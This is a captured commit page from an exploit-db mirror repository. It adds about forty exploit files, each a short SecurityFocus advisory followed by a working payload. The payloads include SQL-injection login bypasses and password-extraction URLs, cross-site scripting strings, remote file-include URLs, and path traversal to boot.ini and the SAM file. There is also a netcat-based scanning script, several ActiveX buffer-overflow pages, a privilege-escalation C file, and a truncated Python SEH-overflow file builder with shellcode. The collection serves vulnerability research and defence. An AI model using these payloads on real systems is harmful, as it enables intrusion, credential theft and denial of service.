bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_10_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-10 18:14:36 +00:00
parent 8198dd43d5
commit 6cacab32e4
43 changed files with 811 additions and 27668 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27642
files.csv
View file

File diff suppressed because it is too large Load diff

10
platforms/asp/webapps/30807.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/26579/info
DWD Realty is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following proof of concept is available:
Username: Admin
Password: anything' OR 'x'='x

19
platforms/asp/webapps/30841.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config
http://www.example.com/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00

29
platforms/asp/webapps/30842.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&

9
platforms/asp/webapps/30843.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y

9
platforms/asp/webapps/30844.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E

18
platforms/asp/webapps/30845.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
Webroot PoC:
Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot - ie:
http://www.example.com/[CustomerDefinedDir]/getpath.aspx
"
Absolute News Manager Physical Path :
D:\inetpub\www.example.com\[CustomerDefinedDir]\
Please delete this file from your installation.
"

12
platforms/cgi/webapps/30808.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26582/info
GWExtranet is prone to multiple HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input data before using it in dynamically generated content.
Attacker-supplied HTML and script code could execute in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
GWExtranet 3.0 is affected by these issues; other versions may also be vulnerable.
http://www.example.com/GWExtranet/scp.dll/frmonth?filter=<EvilScript>
http://www.example.com/GWExtranet/scp.dll/frmonth?user=<EvilScript>
http://www.example.com/GWExtranet/scp.dll/frmonth?month=<EvilScript>
http://www.example.com/GWExtranet/scp.dll?user=USERID&template=<EvilScript>

9
platforms/cgi/webapps/30818.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26610/info
ht://Dig is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows an attacker to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects ht://Dig 3.2.0b6; other versions may also be vulnerable.
http://www.example.com/cgi-bin/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=<script>alert("foo")</script>&words=foo

29
platforms/hardware/remote/30833.html Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/26659/info
F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
F5 Networks FirePass 4100 SSL VPNs running these firmware versions are vulnerable:
5.4.1 through 5.5.2
6.0
6.0.1
<html>
<iframe src="https://www.example.com/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement(&#039;script&#039;));xss.setAttribute(&#039;src&#039;,&#039;http://www.example2.com/b&#039;)"></iframe>
</html>
-----------------------------------------------
Proof of concept (PoC) URL:
https://www.example.com/my.logon.php3?"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!--
The payload in the example is
"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!--
which injects a &#039;textarea&#039; box

12
platforms/hardware/remote/30834.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26661/info
F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
F5 FirePass 4100 SSL VPNs running these firmware versions are vulnerable:
5.4.1 through 5.5.2
6.0 through 6.0.1
https://target.tld/my.activation.php3?"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!--

32
platforms/linux/local/30839.c Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/26680/info
ZABBIX is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to execute commands with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
This issue affects ZABBIX 1.4.2; prior versions may also be affected.
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>
int main()
{
struct passwd *pw;
pw = getpwnam("abi");
FILE *pipe;
char buf[25];
setgid(pw->pw_gid);
setuid(pw->pw_uid);
printf("my gid: %d\n", getegid());
printf("my uid: %d\n", getuid());
pipe = popen("/usr/bin/id", "r");
while (fgets(buf, sizeof buf, pipe)) {
printf("%s", buf);
}
printf("\n");
pclose(pipe);
}

11
platforms/multiple/dos/30814.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26588/info
Skype is prone to a remote denial-of-service vulnerability because of a NULL-pointer dereference flaw.
Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users.
Skype 3.6.0.216 for Microsoft Windows is vulnerable to this issue; other versions may also be affected.
The following URI is sufficient to trigger this issue:
skype:?voicemail

17
platforms/multiple/remote/30838.html Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/26669/info
Multiple web browsers are prone to a JavaScript key-filtering vulnerability because the browsers fail to securely handle keystroke input from users.
Exploiting this issue requires that users manually type sensitive data. This may require substantial typing from targeted users, so attackers will likely use keyboard-based games, blogs, or other similar pages to entice users to enter the required keyboard input.
<html>
<title>Firefox 2.0.0.11 File Focus Stealing vulnerability</title>
<body>
<form>
<label>
<input type="file" name="foo" />
<br>
<input type="text" name="bar" />
</label>
</body>
</html>

9
platforms/php/webapps/30806.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26575/info
PHPSlideShow is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects PHPSlideShow 0.9.9.2; other versions may also be vulnerable.
http://www.example.com/scripts/demo/phpslideshow.php?directory="><iframe> http://www.example.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html> http://www.example.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf" http://www.example.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E

14
platforms/php/webapps/30810.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/26584/info
Proverbs Web Calendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Proverbs Web Calendar 1.1 is vulnerable; other versions may also be affected.
The following proof of concept is available:
Username: admin
Password: ' or

9
platforms/php/webapps/30811.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26585/info
SimpleGallery is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects SimpleGallery 0.1.3; other versions may also be vulnerable.
http://www.example.com/PATH/index.php?album=[XSS]

9
platforms/php/webapps/30813.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26587/info
FMDeluxe is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows an attacker to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects FMDeluxe 2.1.0; other versions may also be affected.
http://www.example.com/PATH/index.php?action=category&id=[XSS]

10
platforms/php/webapps/30815.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/26592/info
Tilde is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Tilde 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]

11
platforms/php/webapps/30817.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26606/info
Liferay Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Liferay Portal 4.3.1 is vulnerable; other versions may also be affected.
"><script>alert(&#039;xss&#039;)</script>
<html><b>XSS</b></font></html>
"><iframe>

9
platforms/php/webapps/30820.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26614/info
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
http://www.example.com/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http://www.example2.com

9
platforms/php/webapps/30821.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26614/info
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
http://www.example.com/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http://www.example2.com

14
platforms/php/webapps/30822.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/26620/info
BEA AquaLogic Interaction is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to access valid usernames in the Plumtree portal as well as the server hostname, build date, and server version. Information harvested can aid in further attacks.
The following versions are vulnerable:
BEA Plumtree Foundation in the 5.0 series, version 6.0 through service pack 1 on all platforms
BEA AquaLogic Interaction 6.1 through service pack 1 on all platforms
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_ apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_ topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*admin*&in_hi_ req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_ topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps= 1&control=advancedstart&in_ hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and

11
platforms/php/webapps/30823.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26629/info
The 'bcoos' program is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
These issues affect the application's arcade, myalbum, mylinks, and ecal modules.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect bcoos 1.0.10; other versions may also be affected.
http://www.example.com/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

11
platforms/php/webapps/30824.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26629/info
The 'bcoos' program is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
These issues affect the application's arcade, myalbum, mylinks, and ecal modules.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect bcoos 1.0.10; other versions may also be affected.
http://www.example.com/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

9
platforms/php/webapps/30826.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/admin/modules/install_module.php?level=http://www.example2.com

9
platforms/php/webapps/30827.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/admin/modules/uninstall_module.php?level=http://www.example2.com

9
platforms/php/webapps/30828.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/admin/patch/index.php?level=http://www.example2.com

9
platforms/php/webapps/30829.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/ossigeno/admin/install_module.php?level=http://www.example2.com

9
platforms/php/webapps/30830.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/ossigeno/admin/uninstall_module.php?level=http://www.example2.com

9
platforms/php/webapps/30831.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.example2.com

9
platforms/php/webapps/30836.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26664/info
The 'bcoos' program is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects bcoos 1.0.10; other versions may also be affected.
http://www.example.com/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

9
platforms/php/webapps/30846.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26698/info
phpMyChat is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpMyChat 0.14.5 is vulnerable; other versions may also be affected.
http://www.example.com/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=>"&#039;><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%23x20;Here%26quot;)>&AUTH_USERNAME=&AUTH_PASSWORD=

12
platforms/php/webapps/30847.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26698/info
phpMyChat is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpMyChat 0.14.5 is vulnerable; other versions may also be affected.
http://www.example.com/mychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=
"></STYLE><STYLE>@import"javascript:alert(&#039;This%20XSS%20Is%20Xss&#039;)";</STYLE>&#039;
=http://www.example.com/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=1196698786&B=
>"><script>alert("This%20XSS%20Test%20Successful")</script>

27
platforms/unix/remote/30835.sh Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/26663/info
Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.
Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected.
#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
echo "$0 <hosts-file>"
exit
fi
for i in `cat $1`
do
if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
-i '<PROCHECKUP>' > /dev/null
then
echo "$i is VULNERABLE!"
fi
done

26
platforms/webapps/10209.txt
View file

@ -1,26 +0,0 @@
**************************************************************
Product: Everfocus EDSR series
Version affected: 1.4 and older
Website: http://www.everfocus.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Vuln: remote DVR applet authentication bypass
**************************************************************
The EDSR firmware don't handle correctly users authentication and sessions.
This exploit let you to connect to every remote DVR (without username
and password) and see the live cams :)
Exploit: http://www.andreafabrizi.it/files/EverFocus_Edsr_Exploit.tar.gz
I discovered this vulnerability one year ago and i have informed the
vendor, but apparently
there is no solution at this time.
--
Andrea Fabrizi
http://www.andreafabrizi.it
http://www.exploit-db.com/sploits/2009-11-22-EverFocus_Edsr_Exploit.tar.gz

37
platforms/windows/dos/30812.html Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/26586/info
The RealPlayer ActiveX control is prone to a buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.
A remote attacker may exploit this vulnerability by presenting a malicious file to a victim and enticing them to open it with the vulnerable application.
Successful exploits can allow attackers to run arbitrary code in the context of the user running an application that uses the control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
This issue affects RealPlayer 10.5; other versions may also be affected.
NOTE: This issue was originally covered in BID 22811 - RealMedia RealPlayer Ierpplug.DLL ActiveX Control Multiple Buffer Overflow Vulnerabilities.
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
var obj2 = obj.PlayerProperty(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>

28
platforms/windows/dos/30825.html Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/26630/info
Microsoft Windows Digital Rights Management (DRM) ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
<html>
<script>
function test()
{
var obj;
var x;
x = "AAAA";
for (i=0;i<=21;++i)
x += x;
obj = document.getElementById(&#039;testObj&#039;);
obj.StoreLicense(x);
}
</script>
<body onload="test();">
<object id=&#039;testObj&#039;
classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}">
</object>
</body>
</html>

9
platforms/windows/dos/30832.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26656/info
Yahoo! Toolbar ActiveX Control is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Reports indicate that code execution is not possible, but this has not been confirmed.
Yahoo! Toolbar 1.4.1 is vulnerable to this issue; other versions may also be affected.
<html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript> arg1=String(517140, "A") target.c arg1 </script> </body></html>

13
platforms/windows/dos/30840.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/26689/info
SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed attempts may cause denial-of-service conditions.
Versions prior to SonicWALL Global VPN Client 4.0.0.830 are affected.
The following proof of concept was supplied:
<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x.%x.%x.%x.%x.%x

11
platforms/windows/remote/30809.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26583/info
Sentinel Protection Server and Keys Server are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
This issue affects Protection Server 7.0.0 through 7.4.0, and Keys Server 1.0.3; earlier versions may also be vulnerable.
http://www.example.com:6002/../../../../../../boot.ini
http://www.example.com:7002/../../../../../../winnt/repair/sam

41
platforms/windows/remote/30816.py Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/26604/info
Autonomy KeyView is prone to multiple buffer-overflow vulnerabilities.
Successfully exploiting these issues could allow an attacker to execute arbitrary code in the context of the user running the application.
Multiple applications incorporate the vulnerable KeyView component, so they are also considered vulnerable to these issues.
NOTE: These issues are similar to those described in BID 26175 (Autonomy KeyView Multiple Buffer Overflow Vulnerabilities) but affect a different component.
from sys import argv
from struct import pack
def createMaliciousFile(filename):
seh_offset = 0x9c4
jumper = 0x06ad890d # pop pop ret ... CHANGE IT! (dll is rebased)
shellcode = '\x90' * 0x400 + '\xCC' # nopsled and int 3
content = '\x00\x00' # header record type
content += '\x1a\x00' # header length
content += '\x05\x10\x04\x00\x00\x00\x00\x00\x09\x00\x00\x01'
